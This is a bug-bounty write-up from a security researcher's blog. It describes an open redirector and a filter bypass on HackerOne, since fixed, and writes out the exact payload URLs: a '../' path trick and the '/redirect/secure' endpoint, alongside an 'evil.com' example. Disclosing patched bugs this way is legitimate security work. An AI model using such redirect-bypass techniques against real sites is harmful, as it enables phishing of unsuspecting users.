Pranav Hivarekar's Security Blog

REST-API Lover | Security Researcher | API Coder | Ambivert | GET /noob

Home     About      Favorite Books      Favorite Bugs     

HackerOne Bug - Redirect Filter Bypass and Open Redirector

What is Open Redirector ?

Open Redirect vulnerability allows attacker of an web application to redirect users to any external sites. Here, there is no validation of the passed input by attacker. This is basically used in phishing attacks.

eg. http://site.com/redirect.php?url=http://evil.com/

Here, if there is no validation of 'url' parameter, it will redirect to 'http://evil.com/'. This is 'Open Redirector'.

Open Redirector on HackerOne

HackerOne made few changes recently. When any external link was posted in a report or as a comment, then after clicking it redirected to 'External link warning' page. After clicking 'Proceed', user is redirected to external link.
eg. https://hackerone.com/redirect?signature=0030f1548bef809f5c6344a14559c98ec48213d2&url=http%3A%2F%2Fwww.google.com%2F

alt

Now, if we make some changes to the link then it was becoming a 'Open Redirector'.

https://hackerone.com/redirect/secure?signature=0030f1548bef809f5c6344a14559c98ec48213d2&url=http%3A%2F%2Fwww.google.com%2F

I reported this, but the HackerOne team said,

alt

Then, I went to work on 'Redirect Filter'.

Redirect Filter Bypass

While I was working, I found that when any user posts an internal link i.e 'https://hackerone.com' then it was placed in anchor tag as follows:

<a href="https://hackerone.com" title="https://hackerone.com">https://hackerone.com</a>

Now, if user posts an external link i.e 'http://google.com' then it was also placed in anchor tag as follows:

<a href="/redirect?signature=0030f1548bef809f5c6344a14559c98ec48213d2&amp;url=http%3A%2F%2Fwww.google.com%2F" target="_blank" title="http://www.google.com">http://www.google.com</a>

Note the '/redirect', it is 'Redirect Filter'.

Now, I started playing with '/redirect'. In the end, I found that by adding '../' to the link it bypassed 'Redirect Filter'. i.e 'https://hackerone.com/../redirect/?signature=43cd652c2f1835df993825d00bed0660f498fc42&url=http%3A%2F%2Fwww.google.com'
This was placed in anchor tag as follows:

<a href="https://hackerone.com/../redirect/?signature=43cd652c2f1835df993825d00bed0660f498fc42&amp;url=http%3A%2F%2Fwww.google.com" title="https://hackerone.com/../redirect/?signature=43cd652c2f1835df993825d00bed0660f498fc42&amp;url=http%3A%2F%2Fwww.google.com">https://hackerone.com/../redirect/?signature=43cd652c2f1835df993825d00bed0660f498fc42&amp;url=http%3A%2F%2Fwww.google.com</a>

Here, it was bypassed.

Final Exploit

This exploit should work against any random victim (user) of HackerOne. So, using my mind, I got an idea of combining 'Open Redirector' and 'Redirect Filter Bypass' to create an exploit to damage other users.

Now, I posted a link i.e 'https://hackerone.com/../redirect/secure?signature=43cd652c2f1835df993825d00bed0660f498fc42&url=http%3A%2F%2Fwww.google.com'. It was placed in anchor tag as follows:

<a href="https://hackerone.com/../redirect/secure?signature=43cd652c2f1835df993825d00bed0660f498fc42&amp;url=http%3A%2F%2Fwww.google.com" title="https://hackerone.com/../redirect/secure?signature=43cd652c2f1835df993825d00bed0660f498fc42&amp;url=http%3A%2F%2Fwww.google.com">https://hackerone.com/../redirect/secure?signature=43cd652c2f1835df993825d00bed0660f498fc42&amp;url=http%3A%2F%2Fwww.google.com</a>

This not only bypassed 'Redirect Filter' but also redirected users to external sites. HackerOne team resolved the issue in few working days and rewarded me for the same.

Video Proof Of Concept :

HackerOne Report : https://hackerone.com/reports/28865

I would like to Thank Michiel Prins (Co-founder of HackerOne), Jobert Abma (Co-founder of HackerOne) and whole HackerOne team for their enormous support everytime.

Hope you enjoyed this.